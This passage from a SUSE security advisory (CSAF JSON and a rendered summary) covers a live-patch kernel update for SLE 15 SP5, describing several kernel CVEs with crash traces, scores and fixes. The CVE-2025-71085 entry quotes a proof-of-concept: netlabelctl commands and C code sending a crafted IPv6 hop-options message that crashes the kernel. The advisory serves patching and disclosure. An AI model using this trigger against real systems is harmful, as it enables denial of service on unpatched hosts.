"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:34:30Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1039-1
Vulnerability from csaf_suse - Published: 2026-03-25 12:34 - Updated: 2026-03-25 12:34Summary
Security update for the Linux Kernel (Live Patch 29 for SUSE Linux Enterprise 15 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 29 for SUSE Linux Enterprise 15 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.116 fixes various security issues
The following security issues were fixed:
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1039,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1039
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
